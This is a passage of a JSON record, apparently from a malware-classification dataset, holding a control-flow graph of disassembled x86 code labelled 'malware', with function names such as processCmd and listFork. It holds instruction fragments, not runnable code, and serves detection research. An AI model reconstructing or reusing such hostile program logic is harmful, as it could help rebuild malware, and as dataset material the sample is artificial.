"al, byte ptr es:[edi]"]]}, "134537042": {"node_name": "main+0x4b9", "node_label": "12", "insns": [[134537042, "mov", "eax, ecx"], [134537044, "not", "eax"], [134537046, "dec", "eax"], [134537047, "add", "eax, dword ptr [ebp - 0x38]"], [134537050, "dec", "eax"], [134537051, "mov", "byte ptr [eax], 0"]]}, "134537119": {"node_name": "main+0x506", "node_label": "15", "insns": [[134537119, "mov", "eax, ecx"], [134537121, "not", "eax"], [134537123, "dec", "eax"], [134537124, "add", "eax, dword ptr [ebp - 0x38]"], [134537127, "dec", "eax"], [134537128, "mov", "al, byte ptr [eax]"], [134537130, "cmp", "al, 0xd"], [134537132, "je", "0x804df39"]]}, "134537134": {"node_name": "main+0x515", "node_label": "8", "insns": [[134537134, "mov", "eax, dword ptr [ebp - 0x38]"], [134537137, "mov", "dword ptr [ebp - 0x28], eax"], [134537140, "jmp", "0x804dfb9"]]}, "134537145": {"node_name": "main+0x520", "node_label": "9", "insns": [[134537145, "mov", "eax, dword ptr [ebp - 0x38]"], [134537148, "mov", "al, byte ptr [eax]"], [134537150, "cmp", "al, 0x20"], [134537152, "je", "0x804dfcb"]]}, "134537163": {"node_name": "main+0x532", "node_label": "17", "insns": [[134537163, "mov", "eax, dword ptr [ebp - 0x38]"], [134537166, "mov", "byte ptr [eax], 0"], [134537169, "inc", "dword ptr [ebp - 0x38]"], [134537172, "mov", "eax, dword ptr [ebp - 0x28]"], [134537175, "mov", "dword ptr [ebp - 0x24], eax"], [134537178, "jmp", "0x804dffc"]]}, "134537154": {"node_name": "main+0x529", "node_label": "9", "insns": [[134537154, "mov", "eax, dword ptr [ebp - 0x38]"], [134537157, "mov", "al, byte ptr [eax]"], [134537159, "test", "al, al"], [134537161, "jne", "0x804dfb6"]]}, "134537212": {"node_name": "main+0x563", "node_label": "9", "insns": [[134537212, "mov", "eax, dword ptr [ebp - 0x24]"], [134537215, "mov", "al, byte ptr [eax]"], [134537217, "test", "al, al"], [134537219, "jne", "0x804dfdc"]]}, "134537142": {"node_name": "main+0x51d", "node_label": "3", "insns": [[134537142, "inc", "dword ptr [ebp - 0x38]"]]}, "134537180": {"node_name": "main+0x543", "node_label": "19", "insns": [[134537180, "mov", "eax, dword ptr [ebp - 0x24]"], [134537183, "mov", "al, byte ptr [eax]"], [134537185, "and", "eax, 0xff"], [134537190, "sub", "esp, 0xc"], [134537193, "push", "eax"], [134537194, "call", "0x804e754"]]}, "134537221": {"node_name": "main+0x56c", "node_label": "48", "insns": [[134537221, "mov", "eax, dword ptr [ebp - 0x28]"], [134537224, "mov", "dword ptr [ebp - 0x14c8], eax"], [134537230, "mov", "dword ptr [ebp - 0x14cc], 0x805613d"], [134537240, "mov", "dword ptr [ebp - 0x14d0], 3"], [134537250, "cld", ""], [134537251, "mov", "esi, dword ptr [ebp - 0x14c8]"], [134537257, "mov", "edi, dword ptr [ebp - 0x14cc]"], [134537263, "mov", "ecx, dword ptr [ebp - 0x14d0]"]]}, "134539092": {"node_name": "toupper", "node_label": "17", "insns": [[134539092, "mov", "edx, dword ptr [esp + 4]"], [134539096, "lea", "eax, [edx + 0x80]"], [134539102, "cmp", "eax, 0x17f"], [134539107, "ja", "0x804e76e"]]}, "134537199": {"node_name": "main+0x556", "node_label": "13", "insns": [[134537199, "add", "esp, 0x10"], [134537202, "mov", "dl, al"], [134537204, "mov", "eax, dword ptr [ebp - 0x24]"], [134537207, "mov", "byte ptr [eax], dl"], [134537209, "inc", "dword ptr [ebp - 0x24]"]]}, "134537269": {"node_name": "main+0x59c", "node_label": "2", "insns": [[134537269, "repe cmpsb", "byte ptr [esi], byte ptr es:[edi]"]]}, "134537271": {"node_name": "main+0x59e", "node_label": "23", "insns": [[134537271, "seta", "dl"], [134537274, "setb", "al"], [134537277, "mov", "cl, dl"], [134537279, "sub", "cl, al"], [134537281, "mov", "al, cl"], [134537283, "movsx", "eax, al"], [134537286, "test", "eax, eax"], [134537288, "jne", "0x804e120"]]}, "134537294": {"node_name": "main+0x5b5", "node_label": "5", "insns": [[134537294, "call", "0x80494e0"]]}, "134537504": {"node_name": "main+0x687", "node_label": "24", "insns": [[134537504, "mov", "dword ptr [ebp - 0x20], 1"], [134537511, "mov", "eax, dword ptr [ebp - 0x38]"], [134537514, "sub", "esp, 8"], [134537517, "push", "0x805614a"], [134537522, "push", "eax"], [134537523, "call", "0x804f954"]]}, "134517984": {"node_name": "listFork", "node_label": "12", "insns": [[134517984, "push", "ebp"], [134517985, "mov", "ebp, esp"], [134517987, "push", "ebx"], [134517988, "sub", "esp, 0x34"], [134517991, "call", "0x804e3d0"]]}, "134537299": {"node_name": "main+0x5ba", "node_label": "8", "insns": [[134537299, "test", "eax, eax"], [134537301, "jne", "0x804e234"]]}, "134543700": {"node_name": "strtok", "node_label": "21", "insns": [[134543700, "sub", "esp, 0x10"], [134543703, "push", "0x805e4a0"], [134543708, "push", "dword ptr [esp + 0x1c]"], [134543712, "push", "dword ptr [esp + 0x1c]"], [134543716, "call", "0x80528cc"]]}, "134537528": {"node_name": "main+0x69f", "node_label": "17", "insns": [[134537528, "add", "esp, 0x10"], [134537531, "mov", "dword ptr [ebp - 0x1c], eax"], [134537534, "mov", "eax, dword ptr [ebp - 0x28]"], [134537537, "mov", "dword ptr [ebp - 0x78], eax"], [134537540, "jmp", "0x804e1e4"]]}, "134537307": {"node_name": "main+0x5c2", "node_label": "25", "insns": [[134537307, "lea", "eax, [ebp - 0x478]"], [134537313, "mov", "edx, eax"], [134537315, "mov", "eax, 0x400"], [134537320, "sub", "esp, 4"], [134537323, "push", "eax"], [134537324, "push", "0"], [134537326, "push", "edx"], [134537327, "call", "0x804f6f0"]]}, "134537700": {"node_name": "main+0x74b", "node_label": "10", "insns": [[134537700, "cmp", "dword ptr [ebp - 0x1c], 0"], [134537704, "jne", "0x804e149"]]}, "134537332": {"node_name": "main+0x5db", "node_label": "27", "insns": [[134537332, "add", "esp, 0x10"], [134537335, "mov", "eax, 0x8056140"], [134537340, "sub", "esp, 4"], [134537343, "push", "dword ptr [ebp - 0x38]"], [134537346, "push", "eax"], [134537347, "lea", "eax, [ebp - 0x478]"], [134537353, "push", "eax"], [134537354, "call", "0x8048806"]]}, "134543088": {"node_name": "memset", "node_label": "13", "insns": [[134543088, "push", "edi"], [134543089, "mov", "eax, dword ptr [esp + 0xc]"], [134543093, "mov", "ecx, dword ptr [esp + 0x10]"], [134543097, "mov", "edi, dword ptr [esp + 8]"]]}, "134537710": {"node_name": "main+0x755", "node_label": "15", "insns": [[134537710, "sub", "esp, 8"], [134537713, "lea", "eax, [ebp - 0x78]"], [134537716, "push", "eax"], [134537717, "push", "dword ptr [ebp - 0x20]"], [134537720, "call", "0x804c6f2"]]}, "134537545": {"node_name": "main+0x6b0", "node_label": "9", "insns": [[134537545, "mov", "eax, dword ptr [ebp - 0x1c]"], [134537548, "mov", "al, byte ptr [eax]"], [134537550, "cmp", "al, 0xa"], [134537552, "je", "0x804e1cf"]]}, "134514694": {"node_name": "szprintf", "node_label": "31", "insns": [[134514694, "push", "ebp"], [134514695, "mov", "ebp, esp"], [134514697, "sub", "esp, 0x18"], [134514700, "lea", "eax, [ebp + 0x10]"], [134514703, "mov", "dword ptr [ebp - 4], eax"], [134514706, "mov", "eax, dword ptr [ebp - 4]"], [134514709, "sub", "esp, 4"], [134514712, "push", "eax"], [134514713, "push", "dword ptr [ebp + 0xc]"], [134514716, "lea", "eax, [ebp + 8]"], [134514719, "push", "eax"], [134514720, "call", "0x804859c"]]}, "134537359": {"node_name": "main+0x5f6", "node_label": "24", "insns": [[134537359, "add", "esp, 0x10"], [134537362, "mov", "eax, 0x8056148"], [134537367, "sub", "esp, 8"], [134537370, "push", "eax"], [134537371, "lea", "eax, [ebp - 0x478]"], [134537377, "push", "eax"], [134537378, "call", "0x80488f7"]]}, "134537725": {"node_name": "main+0x764", "node_label": "9", "insns": [[134537725, "add", "esp, 0x10"], [134537728, "cmp", "dword ptr [ebp - 0x20], 1"], [134537732, "jle", "0x804e234"]]}, "134530802": {"node_name": "processCmd", "node_label": "62", "insns": [[134530802, "push", "ebp"], [134530803, "mov", "ebp, esp"], [134530805, "push", "edi"], [134530806, "push", "esi"], [134530807, "push", "ebx"], [134530808, "sub", "esp, 0x16c"], [134530814, "mov", "eax, dword ptr [ebp + 0xc]"], [134530817, "mov", "eax, dword ptr [eax]"], [134530819, "mov", "dword ptr [ebp - 0xc0], eax"], [134530825, "mov", "dword ptr [ebp - 0xc4], 0x8055e77"], [134530835, "mov", "dword ptr [ebp - 0xc8], 5"], [134530845, "cld", ""], [134530846, "mov", "esi, dword ptr [ebp - 0xc0]"], [134530852, "mov", "edi, dword ptr [ebp - 0xc4]"], [134530858, "mov", "ecx, dword ptr [ebp - 0xc8]"]]}, "134537679": {"node_name": "main+0x736", "node_label": "15", "insns": [[134537679, "sub", "esp, 8"], [134537682, "push", "0x805614a"], [134537687, "push", "0"], [134537689, "call", "0x804f954"]]}, "134537554": {"node_name": "main+0x6b9", "node_label": "26", "insns": [[134537554, "mov", "ebx, dword ptr [ebp - 0x20]"], [134537557, "mov", "eax, dword ptr [ebp - 0x1c]"], [134537560, "mov", "ecx, 0xffffffff"], [134537565, "mov", "dword ptr [ebp - 0x14d4], eax"], [134537571, "mov", "al, 0"], [134537573, "cld", ""], [134537574, "mov", "edi, dword ptr [ebp - 0x14d4]"]]}, "134514935": {"node_name": "fdpopen", "node_label": "16", "insns": [[134514935, "push", "ebp"], [134514936, "mov", "ebp, esp"], [134514938, "push", "edi"], [134514939, "sub", "esp, 0x24"], [134514942, "mov", "edx, dword ptr [ebp + 0xc]"], [134514945, "mov", "al, byte ptr [edx]"], [134514947, "cmp", "al, 0x72"], [134514949, "je", "0x8048910"]]}, "134537383": {"node_name": "main+0x60e", "node_label": "8", "insns": [[134537383, "add", "esp, 0x10"], [134537386, "mov", "dword ptr [ebp - 0x18], eax"], [134537389, "jmp", "0x804e0ea"]]}, "134537734": {"node_name": "main+0x76d", "node_label": "16", "insns": [[134537734, "mov", "dword ptr [ebp - 0x14], 1"], [134537741, "mov", "dword ptr [ebp - 0x14], 1"], [134537748, "jmp", "0x804e22c"]]}, "134537694": {"node_name": "main+0x745", "node_label": "6", "insns": [[134537694, "add", "esp, 0x10"], [134537697, "mov", "dword ptr [ebp - 0x1c], eax"]]}, "134537580": {"node_name": "main+0x6d3", "node_label": "2", "insns": [[134537580, "repne scasb", "al, byte ptr es:[edi]"]]}, "134537450": {"node_name": "main+0x651", "node_label": "23", "insns": [[134537450, "sub", "esp, 4"], [134537453, "push", "dword ptr [ebp - 0x18]"], [134537456, "push", "0x400"], [134537461, "lea", "eax, [ebp - 0x478]"], [134537467, "push", "eax"], [134537468, "call", "0x8048c51"]]}, "134537772": {"node_name": "main+0x793", "node_label": "8", "insns": [[134537772, "mov", "eax, dword ptr [ebp - 0x14]"], [134537775, "cmp", "eax, dword ptr [ebp - 0x20]"], [134537778, "jl", "0x804e216"]]}, "134537582": {"node_name": "main+0x6d5", "node_label": "15", "insns": [[134537582, "mov", "eax, ecx"], [134537584, "not", "eax"], [134537586, "dec", "eax"], [134537587, "inc", "eax"], [134537588, "sub", "esp, 0xc"], [134537591, "push", "eax"], [134537592, "call", "0x8050142"]]}, "134515793": {"node_name": "fdgets", "node_label": "22", "insns": [[134515793, "push", "ebp"], [134515794, "mov", "ebp, esp"], [134515796, "sub", "esp, 0x18"], [134515799, "mov", "dword ptr [ebp - 8], 1"], [134515806, "mov", "dword ptr [ebp - 4], 0"], [134515813, "jmp", "0x8048c84"]]}, "134537473": {"node_name": "main+0x668", "node_label": "7", "insns": [[134537473, "add", "esp, 0x10"], [134537476, "test", "eax, eax"], [134537478, "jne", "0x804e0af"]]}, "134537750": {"node_name": "main+0x77d", "node_label": "16", "insns": [[134537750, "mov", "eax, dword ptr [ebp - 0x14]"], [134537753, "mov", "eax, dword ptr [ebp + eax*4 - 0x78]"], [134537757, "sub", "esp, 0xc"], [134537760, "push", "eax"], [134537761, "call", "0x8050aed"]]}, "134537597": {"node_name": "main+0x6e4", "node_label": "30", "insns": [[134537597, "add", "esp, 0x10"], [134537600, "mov", "dword ptr [ebp + ebx*4 - 0x78], eax"], [134537604, "mov", "eax, dword ptr [ebp - 0x1c]"], [134537607, "mov", "ecx, 0xffffffff"], [134537612, "mov", "dword ptr [ebp - 0x14d8], eax"], [134537618, "mov", "al, 0"], [134537620, "cld", ""], [134537621, "mov", "edi, dword ptr [ebp - 0x14d8]"]]}, "134537480": {"node_name": "main+0x66f", "node_label": "11", "insns": [[134537480, "sub", "esp, 0xc"], [134537483, "push", "dword ptr [ebp - 0x18]"], [134537486, "call", "0x8048aed"]]}, "134537391": {"node_name": "main+0x616", "node_label": "15", "insns": [[134537391, "lea", "eax, [ebp - 0x478]"], [134537397, "sub", "esp, 0xc"], [134537400, "push", "eax"], [134537401, "call", "0x80482b7"]]}, "134537766": {"node_name": "main+0x78d", "node_label": "6", "insns": [[134537766, "add", "esp, 0x10"], [134537769, "inc", "dword ptr [ebp - 0x14]"]]}, "134537627": {"node_name": "main+0x702", "node_label": "2", "insns": [[134537627, "repne scasb", "al, byte ptr es:[edi]"]]}, "134515437": {"node_name": "fdpclose", "node_label": "18", "insns": [[134515437, "push", "ebp"], [134515438, "mov", "ebp, esp"], [134515440, "sub", "esp, 0x128"], [134515446, "mov", "eax, dword ptr [0x805c480]"], [134515451, "test", "eax, eax"], [134515453, "je", "0x8048b15"]]}, "134537491": {"node_name": "main+0x67a", "node_label": "13", "insns": [[134537491, "add", "esp, 0x10"], [134537494, "sub", "esp, 0xc"], [134537497, "push", "0"], [134537499, "call", "0x80513c0"]]}, "134537406": {"node_name": "main+0x625", "node_label": "28", "insns": [[134537406, "add", "esp, 0x10"], [134537409, "lea", "eax, [ebp - 0x478]"], [134537415, "mov", "edx, eax"], [134537417, "mov", "eax, 0x400"], [134537422, "sub", "esp, 4"], [134537425, "push", "eax"], [134537426, "push", "0"], [134537428, "push", "edx"], [134537429, "call", "0x804f6f0"]]}, "134537629": {"node_name": "main+0x704", "node_label": "22", "insns": [[134537629, "mov", "eax, ecx"], [134537631, "not", "eax"], [134537633, "dec", "eax"], [134537634, "lea", "edx, [eax + 1]"], [134537637, "mov", "eax, dword ptr [ebp - 0x20]"], [134537640, "mov", "eax, dword ptr [ebp + eax*4 - 0x78]"], [134537644, "mov", "edi, eax"], [134537646, "cld", ""], [134537647, "mov", "ecx, edx"], [134537649, "mov", "al, 0"]]}, "134537434": {"node_name": "main+0x641", "node_label": "13", "insns": [[134537434, "add", "esp, 0x10"], [134537437, "sub", "esp, 0xc"], [134537440, "push", "1"], [134537442, "call", "0x8051494"]]}, "134537651": {"node_name": "main+0x71a", "node_label": "2", "insns": [[134537651, "rep stosb", "byte ptr es:[edi], al"]]}, "134537447": {"node_name": "main+0x64e", "node_label": "3", "insns": [[134537447, "add", "esp, 0x10"]]}, "134537653": {"node_name": "main+0x71c", "node_label": "20", "insns": [[134537653, "mov", "edx, dword ptr [ebp - 0x1c]"], [134537656, "mov", "eax, dword ptr [ebp - 0x20]"], [134537659, "mov", "eax, dword ptr [ebp + eax*4 - 0x78]"], [134537663, "sub", "esp, 8"], [134537666, "push", "edx"], [134537667, "push", "eax"], [134537668, "call", "0x804f728"]]}, "134543144": {"node_name": "__GI_strcpy", "node_label": "13", "insns": [[134543144, "push", "edi"], [134543145, "push", "esi"], [134543146, "sub", "esp, 4"], [134543149, "mov", "esi, dword ptr [esp + 0x14]"], [134543153, "mov", "edi, dword ptr [esp + 0x10]"]]}, "134537673": {"node_name": "main+0x730", "node_label": "6", "insns": [[134537673, "add", "esp, 0x10"], [134537676, "inc", "dword ptr [ebp - 0x20]"]]}}, "edge_list": [[134535833, 134535823], [134535833, 134535870], [134535870, 134539132], [134535870, 134535884], [134535884, 134535912], [134535912, 134535914], [134535912, 134535912], [134535914, 134535941], [134535914, 134543192], [134535941, 134538628], [134535941, 134535974], [134535974, 134538940], [134535974, 134535987], [134535987, 134538272], [134535987, 134535997], [134535997, 134549188], [134535997, 134536008], [134536008, 134538940], [134536008, 134536021], [134536021, 134538272], [134536021, 134536031], [134536031, 134513032], [134536031, 134536039], [134536039, 134535302], [134536039, 134536047], [134536047, 134538192], [134536047, 134536052], [134536052, 134536091], [134536052, 134536061], [134536091, 134536097], [134536091, 134536121], [134536061, 134538988], [134536061, 134536078], [134536097, 134538192], [134536097, 134536102], [134536121, 134538812], [134536121, 134536126], [134536078, 134550464], [134536102, 134536121], [134536102, 134536111], [134536126, 134538044], [134536126, 134536139], [134536111, 134550464], [134536139, 134545416], [134536139, 134536154], [134536154, 134536159], [134536159, 134534993], [134536159, 134536164], [134536164, 134536183], [134536164, 134536168], [134536183, 134535823], [134536183, 134536188], [134536168, 134550676], [134536168, 134536178], [134536188, 134514730], [134536188, 134536209], [134536178, 134536159], [134536209, 134537780], [134537780, 134537807], [134537780, 134517099], [134537807, 134537823], [134537807, 134536231], [134537823, 134536159], [134536231, 134536668], [134536668, 134536243], [134536668, 134536730], [134536243, 134538988], [134536243, 134536274], [134536730, 134536744], [134536730, 134536762], [134536274, 134536285], [134536274, 134536665], [134536744, 134536243], [134536744, 134536762], [134536762, 134536788], [134536762, 134513335], [134536285, 134536336], [134536665, 134536668], [134536788, 134543260], [134536788, 134536811], [134536336, 134536394], [134536336, 134536294], [134536811, 134536826], [134536811, 134536853], [134536394, 134536408], [134536394, 134536422], [134536294, 134536336], [134536826, 134514730], [134536826, 134536845], [134536853, 134543260], [134536853, 134536873], [134536408, 134536422], [134536408, 134536294], [134536422, 134545730], [134536422, 134536505], [134536845, 134537780], [134536873, 134536888], [134536873, 134536898], [134536505, 134536554], [134536888, 134550464], [134536898, 134536920], [134536898, 134537780], [134536554, 134536612], [134536554, 134536520], [134536920, 134536932], [134536612, 134536626], [134536612, 134536640], [134536520, 134536554], [134536932, 134536950], [134536932, 134536941], [134536626, 134536640], [134536626, 134536520], [134536640, 134548205], [134536640, 134536654], [134536950, 134537780], [134536950, 134536963], [134536941, 134536950], [134536941, 134536929], [134536654, 134536665], [134536963, 134536999], [134536929, 134536932], [134536999, 134537001], [134536999, 134536999], [134537001, 134537054], [134537054, 134537077], [134537077, 134537079], [134537077, 134537077], [134537079, 134537017], [134537079, 134537094], [134537017, 134537040], [134537094, 134537117], [134537040, 134537040], [134537040, 134537042], [134537117, 134537119], [134537117, 134537117], [134537042, 134537054], [134537119, 134537134], [134537119, 134537017], [134537134, 134537145], [134537145, 134537163], [134537145, 134537154], [134537163, 134537212], [134537154, 134537163], [134537154, 134537142], [134537212, 134537180], [134537212, 134537221], [134537142, 134537145], [134537180, 134539092], [134537180, 134537199], [134537221, 134537269], [134537199, 134537212], [134537269, 134537271], [134537269, 134537269], [134537271, 134537294], [134537271, 134537504], [134537294, 134517984], [134537294, 134537299], [134537504, 134543700], [134537504, 134537528], [134537299, 134537307], [134537299, 134537780], [134537528, 134537700], [134537307, 134537332], [134537307, 134543088], [134537700, 134537710], [134537700, 134537545], [134537332, 134514694], [134537332, 134537359], [134537710, 134537725], [134537710, 134530802], [134537545, 134537679], [134537545, 134537554], [134537359, 134514935], [134537359, 134537383], [134537725, 134537780], [134537725, 134537734], [134537679, 134543700], [134537679, 134537694], [134537554, 134537580], [134537383, 134537450], [134537734, 134537772], [134537694, 134537700], [134537580, 134537582], [134537580, 134537580], [134537450, 134515793], [134537450, 134537473], [134537772, 134537750], [134537772, 134537780], [134537582, 134545730], [134537582, 134537597], [134537473, 134537480], [134537473, 134537391], [134537750, 134548205], [134537750, 134537766], [134537597, 134537627], [134537480, 134515437], [134537480, 134537491], [134537391, 134537406], [134537391, 134513335], [134537766, 134537772], [134537627, 134537627], [134537627, 134537629], [134537491, 134550464], [134537406, 134537434], [134537406, 134543088], [134537629, 134537651], [134537434, 134550676], [134537434, 134537447], [134537651, 134537653], [134537651, 134537651], [134537447, 134537450], [134537653, 134543144], [134537653, 134537673], [134537673, 134537679]], "label": "malware", "startpoint": 134535833, "endpoints": [134536111, 134536888, 134536078, 134537491]}